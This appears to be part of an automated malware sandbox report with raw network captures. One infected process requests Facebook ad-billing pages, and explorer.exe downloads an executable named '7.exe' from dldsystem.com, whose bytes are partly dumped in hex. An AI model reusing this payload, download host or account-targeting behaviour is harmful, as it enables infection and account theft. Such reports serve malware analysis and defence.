ac 3b 45 bc 07 fd 56 db f7 cf 39 c6 ba 06 8e dc 5b a3 f4 2a 22 9a 53 56 36 d3 8b 3d a6 64 fa 2c
                                                                                                                                  Data Ascii: %K_\O0*O=Z\?{bt#DtR%TG#`V~"+~3E}H5G;1=Axs;/B(RHmCGn&qC68"J_wO[~S{/o{$sB,=1vsB?+ M)6J774k,9,;EV9[*"SV6=d,
                                                                                                                                  2022-10-17 20:06:34 UTC187INData Raw: 06 55 6c c4 79 e5 d3 fa 71 e9 af eb c8 6d 2d 09 54 72 96 59 07 89 31 a9 ff c3 7d 5b 56 73 db 3c d4 d4 7b 23 1b 70 a7 1b f0 7f d7 a0 c7 7a 8e 4a 69 dc 43 20 79 06 1f 67 9c f5 b4 4e 26 ec 80 ff 37 a2 a0 9f e3 05 85 f2 23 91 ab 27 55 f9 f7 5c c4 a3 53 dc 2f 1f c8 81 58 78 63 8a e0 f0 92 0c 68 b9 cb d8 9f 3a 4d 83 06 0d 62 8d 8c f5 da df 62 ea 3a a6 1d 0c e6 08 39 09 ff 6d 9e 8c 38 ef 84 89 eb 90 a1 32 ee 0f 7a 8e 55 42 10 67 45 2e 48 e3 96 ae e9 ef 71 0b f8 2f 44 50 81 30 3f 39 4f c9 49 0c 90 98 41 11 90 a3 6a 0a 1e 9a 48 6f 6b e8 c8 95 e6 b8 a1 41 4a 85 4c 0e 3b 8a 62 9f 70 e0 03 70 fa d0 a8 a8 55 95 69 66 9f b3 52 97 fe de 5a c3 b3 8b 7b 12 20 b6 a5 41 d6 01 19 7a db 9d 1e ba d6 ba 52 1d 12 ea bd bb ff 23 3a 8e c1 96 7a 3e be 2a a0 55 1f c1 d6 45 54 a0 dc
                                                                                                                                  Data Ascii: Ulyqm-TrY1}[Vs<{#pzJiC ygN&7#'U\S/Xxch:Mbb:9m82zUBgE.Hq/DP0?9OIAjHokAJL;bppUifRZ{ AzR#:z>*UET
                                                                                                                                  2022-10-17 20:06:34 UTC195INData Raw: 18 43 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 18 43 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 18 43 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 15 43 00 00 00 00 00 00 00 00 00 e0 17 40 00 68 1c 40 00 e8 1d 40 00 70 22 43 00 a8 18 43 00 01 00 00 00 a8 18 43 00 50 1d 43 00 a0 20 40 00 90 20 40 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 3f 82 41 00 55 ff 40 00 00 00 00 00 02 00 00 00 a0 26 40 00 08 00 00 00 74 26 40 00 09 00 00 00 48 26 40 00 0a 00 00 00 b0 25 40 00 10 00 00 00 84 25 40 00 11 00 00 00 54 25 40 00 12 00 00 00 30 25 40 00 13 00 00 00 04 25 40 00 18 00 00 00 cc 24 40 00 19 00 00 00 a4 24 40 00 1a 00 00 00 6c 24 40 00
                                                                                                                                  Data Ascii: CCCTC@h@@p"CCCPC @ @?A?A?A?A?A?A?A?A?A?AU@&@t&@H&@%@%@T%@0%@%@$@$@l$@
                                                                                                                                  2022-10-17 20:06:34 UTC203INData Raw: d8 be ce c4 c3 ca d6 bc d1 c2 d9 c0 ce ca d8 be c2 bf d4 c3 db bd dc b8 c9 c1 ce c0 d3 c9 da c2 bb bb c1 b8 d7 c3 e2 b8 d2 bf ce bf cd c2 d7 c0 be cc d7 c5 d2 ca d8 c2 cc c5 db c0 cc ca d8 c6 d2 d7 cf be d2 ce d2 c8 cd d1 cf c5 d0 cc db 8c 9a 95 c4 80 7b 83 d3 95 d2 c9 3d 94 c6 cf 37 95 d1 d5 37 a3 b7 cf 3d 9a b9 d0 43 99 bc d0 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 80 80 ce 95 93 8e c9 bf cc c5 da ca d3 cb ce c0 cd b8 ce c3 cd c0 d2 c5 d3 bd d9 c8 d9 b9 d5 c6 c4 a8 d6 c8 cf c0 d1 d1 db c9 d0 c5 d3 c4 ce bb ca b6 d3 ba c4 b2 cb be d7 b5 d8 c1 c5 b5 ce c1 c8 b5 d3 c0 c6 ba d4 bc d5 ba cc c3 c8 be d8 bc c2 c1 d3 b9 cc c2 d2 be c3 c6 cb cb d1 c2 d4 c5 ce b9 cc c3 ca bb dc be c4 bb d4 d1 c6 c4 cb be c6 b7 cc
                                                                                                                                  Data Ascii: {=77=C5
                                                                                                                                  2022-10-17 20:06:34 UTC211INData Raw: 00 00 00 00 00 00 00 af d8 8a 29 a4 dd 95 21 a6 dc 89 24 ab de 85 31 ad de 82 23 ac de 8e 26 a6 e6 8f 2a a4 d6 84 21 ad e0 93 28 b3 de 9a 25 ab da 8a 1b a4 de 94 2c af d0 8f 21 af e3 8b 1e 82 8e 80 27 a5 db 8b 27 00 00 00 00 37 25 4d 21 3d 1c 5a 1c 3f 26 54 1c 43 2a 4c 1e 40 23 52 29 41 19 4e 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: )!$1#&*!(%,!''7%M!=Z?&TC*L@#R)AN


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.549695157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:00 UTC218OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:00 UTC219INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:00 UTC221INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  10192.168.2.549712162.144.15.231443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:21 UTC1167OUTGET /7.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: dldsystem.com
                                                                                                                                  2022-10-17 20:07:22 UTC1167INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:22 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Last-Modified: Mon, 17 Oct 2022 20:00:24 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 354304
                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                  2022-10-17 20:07:22 UTC1167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d5 2e 52 17 91 4f 3c 44 91 4f 3c 44 91 4f 3c 44 85 24 3f 45 9c 4f 3c 44 85 24 39 45 37 4f 3c 44 85 24 38 45 87 4f 3c 44 85 24 3d 45 92 4f 3c 44 91 4f 3d 44 cd 4f 3c 44 f1 35 38 45 80 4f 3c 44 f1 35 3f 45 87 4f 3c 44 f1 35 39 45 dc 4f 3c 44 f5 35 35 45 90 4f 3c 44 f5 35 3e 45 90 4f 3c 44 52 69 63 68 91 4f 3c 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$.RO<DO<DO<D$?EO<D$9E7O<D$8EO<D$=EO<DO=DO<D58EO<D5?EO<D59EO<D55EO<D5>EO<DRichO<DPEL
                                                                                                                                  2022-10-17 20:07:22 UTC1175INData Raw: 83 ff 10 89 75 e0 8d 45 d0 0f 43 45 d0 c6 04 30 00 eb 43 8b 4d e4 8b fe 89 c8 2b fa 2b c2 3b f8 77 21 89 75 e0 83 f9 10 8d 75 d0 0f 43 75 d0 57 03 f2 6a 00 56 e8 6f 67 00 00 83 c4 0c c6 04 3e 00 eb 13 6a 00 57 c6 45 cc 00 8d 4d d0 ff 75 cc 57 e8 a3 26 00 00 83 7d e4 10 8d 7d d0 f2 0f 10 45 1c 0f 43 7d d0 83 ec 08 8b 45 c0 8b 75 e0 f2 0f 11 04 24 ff 75 c4 ff 70 14 8d 45 e8 6a 4c 50 ff 75 bc e8 c1 16 00 00 83 c4 10 50 56 57 e8 96 e5 ff ff 83 7d e4 10 8d 4d d0 8b 75 b8 0f 43 4d d0 50 51 ff 75 18 ff 75 c0 ff 75 10 ff 75 0c 56 ff 75 bc e8 41 12 00 00 8b 4d e4 83 c4 38 83 f9 10 72 28 8b 55 d0 41 8b c2 81 f9 00 10 00 00 72 10 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 29 51 52 e8 6f 4f 00 00 83 c4 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b 4d f0 33 cd
                                                                                                                                  Data Ascii: uECE0CM++;w!uuCuWjVog>jWEMuW&}}EC}Eu$upEjLPuPVW}MuCMPQuuuuVuAM8r(UArP#+w)QRoOMdY_^M3
                                                                                                                                  2022-10-17 20:07:22 UTC1183INData Raw: 35 42 00 64 a1 00 00 00 00 50 83 ec 08 56 a1 18 20 43 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 75 08 8b 06 8b 40 04 8b 44 30 30 8b 48 04 89 4d f0 8b 01 ff 50 04 8d 45 ec c7 45 fc 00 00 00 00 50 e8 53 fb ff ff 83 c4 04 8b c8 8b 10 6a 0a 8b 42 20 ff d0 c7 45 fc ff ff ff ff 8b 4d f0 88 45 08 85 c9 74 11 8b 01 ff 50 08 85 c0 74 08 8b 10 89 c1 6a 01 ff 12 ff 75 08 8b ce e8 b9 0a 00 00 8b ce e8 92 f8 ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c3 55 8b ec 6a ff 68 04 36 42 00 64 a1 00 00 00 00 50 83 ec 48 a1 18 20 43 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 5d 08 8d 4d e8 6a 00 89 5d ec e8 7d 0d 00 00 c7 45 fc 00 00 00 00 8b 3d 1c 69 45 00 a1 0c 69 45 00 89 45 e0 85 ff 75 2f 57 8d 4d e4 e8 5b 0d 00 00 39 3d 1c 69 45 00 75 10 a1
                                                                                                                                  Data Ascii: 5BdPV C3PEdu@D00HMPEEPSjB EMEtPtjuMdY^]Ujh6BdPH C3ESVWPEd]Mj]}E=iEiEEu/WM[9=iEu
                                                                                                                                  2022-10-17 20:07:22 UTC1190INData Raw: 14 8b 07 53 8b 70 10 8b ce ff 15 38 41 42 00 8b cf ff d6 8b c3 5e 5b 5f c3 83 c8 ff c3 55 8b ec 51 8b 45 10 53 8b d9 57 8b 7d 0c 85 c0 7f 0f 7c 04 85 ff 75 09 33 c0 33 d2 e9 c1 00 00 00 83 7b 38 00 74 0f 50 57 ff 75 08 e8 b7 00 00 00 e9 ac 00 00 00 8b 43 1c 56 8b f7 8b 08 85 c9 74 3b 8b 43 2c 8b 00 89 45 fc 85 c0 74 2f 3b c7 72 05 8b c7 89 7d fc 50 51 ff 75 08 e8 2b 23 00 00 8b 4d fc 83 c4 0c 8b 45 08 2b f1 03 c1 89 45 fc 8b 43 2c 29 08 8b 43 1c 01 08 eb 06 8b 45 08 89 45 fc 83 7b 4c 00 74 4e 8b cb e8 e5 f7 ff ff 8b 4d fc 8b d6 b8 ff 0f 00 00 3b f0 76 24 ff 73 4c 50 6a 01 51 e8 73 78 00 00 8b 4d fc 2b f0 03 c8 83 c4 10 89 4d fc 8b d6 3d ff 0f 00 00 75 17 eb d3 85 d2 74 11 ff 73 4c 56 6a 01 51 e8 4b 78 00 00 83 c4 10 2b f0 8b 55 10 2b fe 8b c7 83 da 00 5e
                                                                                                                                  Data Ascii: Sp8AB^[_UQESW}|u33{8tPWuCVt;C,Et/;r}PQu+#ME+EC,)CEE{LtNM;v$sLPjQsxM+M=utsLVjQKx+U+^
                                                                                                                                  2022-10-17 20:07:22 UTC1199INData Raw: 00 8b 45 0c 8b 40 04 83 e0 fd 8b 4d 0c 89 41 04 64 8b 3d 00 00 00 00 8b 5d f8 89 3b 64 89 1d 00 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 02 ef ff ff 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 75 10 ff 76 10 ff 75 08 e8 9f 2c 00 00 83 c4 20 5e 5d c3 55 8b ec 8b 4d 0c 56 8b 75 08 89 0e e8 a3 23 00 00 8b 48 24 89 4e 04 e8 98 23 00 00 89 70 24 8b c6 5e 5d c3 55 8b ec 56 e8 87 23 00 00 8b 75 08 3b 70 24 75 0e 8b 76 04 e8 77 23 00 00 89 70 24 5e 5d c3 e8 6c 23 00 00 8b 48 24 83 c1 04 eb 07 3b f0 74 0b 8d 48 04 8b 01 85 c0 74 09 eb f1 8b 46 04 89 01 eb da e8 a1 6c 00 00 cc 55 8b ec 51 53 fc 8b 45 0c 8b 48 08 33 4d 0c e8 63 ee ff ff 8b 45 08 8b 40 04 83 e0 66 74 11 8b 45 0c c7 40 24 01 00 00 00 33 c0 40 eb 6c eb 6a 6a 01 8b 45 0c ff 70 18
                                                                                                                                  Data Ascii: E@MAd=];d_^[UVuN3jVvvjuvu, ^]UMVu#H$N#p$^]UV#u;p$uvw#p$^]l#H$;tHtFlUQSEH3McE@ftE@$3@ljjEp
                                                                                                                                  2022-10-17 20:07:22 UTC1207INData Raw: b6 42 f4 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 e5 f4 ff ff 8b 46 f5 3b 42 f5 0f 84 87 00 00 00 0f b6 c8 0f b6 42 f5 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 b8 f4 ff ff 0f b6 4e f6 0f b6 42 f6 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 96 f4 ff ff 0f b6 4e f7 0f b6 42 f7 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 74 f4 ff ff 0f b6 4e f8 0f b6 42 f8 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 52 f4 ff ff 8b 46 f9 3b 42 f9 0f 84 01 f8 ff ff 0f b6 42 f9 0f b6 4e f9 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 24 f4 ff ff 0f b6 4e fa 0f b6 42 fa 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 02 f4 ff
                                                                                                                                  Data Ascii: B+t3EF;BB+t3ENB+t3ENB+t3EtNB+t3ERF;BBN+t3E$NB+t3E
                                                                                                                                  2022-10-17 20:07:22 UTC1215INData Raw: 45 fc 3b 47 10 72 07 89 47 10 b0 01 eb 02 32 c0 83 3e 00 75 06 85 db 74 02 89 1e 5f 5e 5b c9 c2 04 00 8b ff 53 56 8b f1 8d 8e 48 04 00 00 e8 dd 0a 00 00 84 c0 74 1b 33 db 39 5e 10 0f 85 c8 00 00 00 e8 8d 2e 00 00 c7 00 16 00 00 00 e8 78 0f 00 00 83 c8 ff 5e 5b c3 89 5e 38 89 5e 1c e9 85 00 00 00 ff 46 10 39 5e 18 0f 8c 8c 00 00 00 ff 76 1c 0f b6 46 31 8b ce 50 e8 8c fe ff ff 89 46 1c 83 f8 08 74 bc 83 f8 07 77 c7 ff 24 85 6d c8 40 00 8b ce e8 ea 00 00 00 eb 45 83 4e 28 ff 89 5e 24 88 5e 30 89 5e 20 89 5e 2c 88 5e 3c eb 38 8b ce e8 8f 00 00 00 eb 27 8b ce e8 16 05 00 00 eb 1e 89 5e 28 eb 21 8b ce e8 62 01 00 00 eb 10 8b ce e8 7f 01 00 00 eb 07 8b ce e8 c4 02 00 00 84 c0 0f 84 6a ff ff ff 8b 46 10 8a 00 88 46 31 84 c0 0f 85 6b ff ff ff ff 46 10 8b ce e8 29
                                                                                                                                  Data Ascii: E;GrG2>ut_^[SVHt39^.x^[^8^F9^vF1PFtw$m@EN(^$^0^ ^,^<8'^(!bjFF1kF)
                                                                                                                                  2022-10-17 20:07:22 UTC1222INData Raw: 48 04 83 60 08 00 89 08 8b 45 08 8b 40 0c 90 c1 e8 02 a8 01 8b 45 08 74 0b 6a fc 59 83 c0 0c f0 21 08 eb 23 8b 40 0c 90 83 e0 41 3c 41 75 18 8b 45 08 8b 40 0c 90 c1 e8 08 a8 01 75 0a 8b 45 08 c7 40 18 00 02 00 00 8b 45 08 8b 40 10 90 56 57 53 50 e8 4e 9a 00 00 23 c2 83 c4 10 83 f8 ff 75 04 0b c0 eb 02 33 c0 5f 5e 5b 5d c3 8b ff 55 8b ec ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 a8 fd ff ff 83 c4 10 5d c3 6a 0c 68 40 13 43 00 e8 b6 9d ff ff 83 65 e4 00 8b 45 08 ff 30 e8 76 f2 ff ff 59 83 65 fc 00 8b 4d 0c e8 34 00 00 00 8b f0 89 75 e4 c7 45 fc fe ff ff ff e8 17 00 00 00 8b c6 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c2 0c 00 8b 75 e4 8b 45 10 ff 30 e8 4b f2 ff ff 59 c3 8b ff 55 8b ec 51 56 8b f1 57 8b 06 8b 38 57 e8 8b 62 00 00 88 45 fc 8b 06 ff 30 8b 46
                                                                                                                                  Data Ascii: H`E@EtjY!#@A<AuE@uE@E@VWSPN#u3_^[]Uuuuu]jh@CeE0vYeM4uEMdY_^[uE0KYUQVW8WbE0F
                                                                                                                                  2022-10-17 20:07:22 UTC1230INData Raw: 65 e8 e8 d9 24 00 00 cc 8b ff 55 8b ec 33 c0 81 7d 08 63 73 6d e0 0f 94 c0 5d c3 8b ff 55 8b ec 83 ec 18 83 7d 10 00 75 12 e8 93 00 00 00 84 c0 74 09 ff 75 08 e8 ca 00 00 00 59 8d 45 0c c6 45 ff 00 89 45 e8 8d 4d fe 8d 45 10 89 45 ec 8d 45 ff 6a 02 89 45 f0 58 89 45 f8 89 45 f4 8d 45 f8 50 8d 45 e8 50 8d 45 f4 50 e8 54 fe ff ff 83 7d 10 00 74 02 c9 c3 ff 75 08 e8 01 00 00 00 cc 8b ff 55 8b ec e8 5d a3 00 00 83 f8 01 74 20 64 a1 30 00 00 00 8b 40 68 c1 e8 08 a8 01 75 10 ff 75 08 ff 15 4c 40 42 00 50 ff 15 50 40 42 00 ff 75 08 e8 4e 00 00 00 59 ff 75 08 ff 15 a0 40 42 00 cc 6a 00 ff 15 3c 40 42 00 85 c0 74 34 b9 4d 5a 00 00 66 39 08 75 2a 8b 48 3c 03 c8 81 39 50 45 00 00 75 1d b8 0b 01 00 00 66 39 41 18 75 12 83 79 74 0e 76 0c 83 b9 e8 00 00 00 00 74 03 b0
                                                                                                                                  Data Ascii: e$U3}csm]U}utuYEEEMEEEjEXEEEPEPEPT}tuU]t d0@huuL@BPP@BuNYu@Bj<@Bt4MZf9u*H<9PEuf9Auytvt
                                                                                                                                  2022-10-17 20:07:22 UTC1238INData Raw: 85 f4 fd ff ff 50 e8 0e 6f ff ff 33 c9 83 c4 0c 85 c0 0f 94 c1 eb 06 8b 8d 44 fd ff ff 89 4e 04 8b 47 08 89 06 8b 46 04 89 47 18 eb 1e 83 fb 01 75 0b 8b 85 38 fd ff ff 89 47 10 eb 0e 83 fb 05 75 09 8b 85 38 fd ff ff 89 47 14 6b c3 0c 57 8b b0 90 75 42 00 8b ce ff 15 38 41 42 00 ff d6 59 8b 8d 34 fd ff ff 85 c0 74 4a 8b 85 3c fd ff ff 89 0c 38 ff b4 9f a0 00 00 00 e8 a9 0f 00 00 8b 8d 30 fd ff ff 8b 85 20 fd ff ff 51 89 84 9f a0 00 00 00 e8 90 0f 00 00 8b 85 1c fd ff ff 59 59 89 47 08 33 c0 8b 4d fc 5f 5e 33 cd 5b e8 4c 52 ff ff c9 c3 81 f9 58 22 43 00 74 4a 8b f3 83 c9 ff 03 f6 8b 44 f7 28 f0 0f c1 08 75 39 ff 74 f7 28 e8 52 0f 00 00 ff 74 f7 24 e8 49 0f 00 00 ff b4 9f a0 00 00 00 e8 3d 0f 00 00 8b 85 3c fd ff ff 83 c4 0c 8b 8d 44 fd ff ff 89 0c 38 89 8c
                                                                                                                                  Data Ascii: Po3DNGFGu8Gu8GkWuB8ABY4tJ<80 QYYG3M_^3[LRX"CtJD(u9t(Rt$I=<D8
                                                                                                                                  2022-10-17 20:07:22 UTC1246INData Raw: 04 83 7d 18 02 75 14 80 39 30 75 0f 6a 03 8d 41 01 50 51 e8 d1 48 ff ff 83 c4 0c 80 7d fc 00 74 0a 8b 45 f0 83 a0 50 03 00 00 fd 33 c0 e9 f5 fe ff ff 33 c0 50 50 50 50 50 e8 b9 92 ff ff cc 8b ff 55 8b ec 83 ec 0c 33 c0 56 57 ff 75 18 8d 7d f4 ff 75 14 ab ab ab 8d 45 f4 8b 7d 1c 50 8b 45 08 57 ff 70 04 ff 30 e8 c1 a9 00 00 83 c9 ff 83 c4 18 8b d0 39 4d 10 74 0e 8b 4d 10 33 c0 83 7d f4 2d 0f 94 c0 2b c8 ff 75 24 8b 75 0c 8d 45 f4 52 50 8b 45 f8 03 c7 50 33 c0 83 7d f4 2d 51 0f 94 c0 03 c6 50 e8 a7 a8 00 00 83 c4 18 85 c0 74 05 c6 06 00 eb 16 ff 75 20 8d 45 f4 6a 00 50 57 ff 75 10 56 e8 07 00 00 00 83 c4 18 5f 5e c9 c3 8b ff 55 8b ec 83 ec 14 8d 4d ec 53 56 57 ff 75 1c e8 d1 7f ff ff 8b 5d 14 33 d2 8b 75 10 8b 7d 08 8b 4b 04 49 38 55 18 74 14 3b ce 75 10 33
                                                                                                                                  Data Ascii: }u90ujAPQH}tEP33PPPPPU3VWu}uE}PEWp09MtM3}-+u$uERPEP3}-QPtu EjPWuV_^UMSVWu]3u}KI8Ut;u3
                                                                                                                                  2022-10-17 20:07:22 UTC1258INData Raw: ff ff ff 8d 8d 74 ff ff ff 89 7d cc 0f 94 c0 40 51 50 89 45 dc 8d 45 cc 50 8d 45 b8 50 e8 a5 87 00 00 83 c4 10 83 f8 ff 0f 84 af 01 00 00 8b 75 d4 4f 03 fe eb 7f 8a 54 01 2d f6 c2 04 74 1e 8a 44 01 2e 80 e2 fb 88 45 ec 8a 07 88 45 ed 8b 45 d4 6a 02 88 54 01 2d 8d 45 ec 50 eb 43 8a 07 88 45 e3 e8 49 8b ff ff 0f b6 4d e3 66 39 1c 48 7d 2c 8d 47 01 89 45 cc 3b 45 a4 0f 83 31 01 00 00 6a 02 8d 45 b8 57 50 e8 10 d3 ff ff 83 c4 0c 83 f8 ff 0f 84 45 01 00 00 8b 7d cc eb 18 6a 01 57 8d 45 b8 50 e8 f3 d2 ff ff 83 c4 0c 83 f8 ff 0f 84 28 01 00 00 53 53 6a 05 8d 45 e4 47 50 ff 75 dc 8d 45 b8 89 7d 9c 50 53 ff 75 88 e8 73 42 00 00 83 c4 20 89 45 cc 85 c0 0f 84 fe 00 00 00 53 8d 4d a0 51 50 8d 45 e4 50 ff 75 94 ff 15 b0 40 42 00 85 c0 0f 84 da 00 00 00 8b 75 b0 2b 75
                                                                                                                                  Data Ascii: t}@QPEEPEPuOT-tD.EEEjT-EPCEIMf9H},GE;E1jEWPE}jWEP(SSjEGPuE}PSusB ESMQPEPu@Bu+u
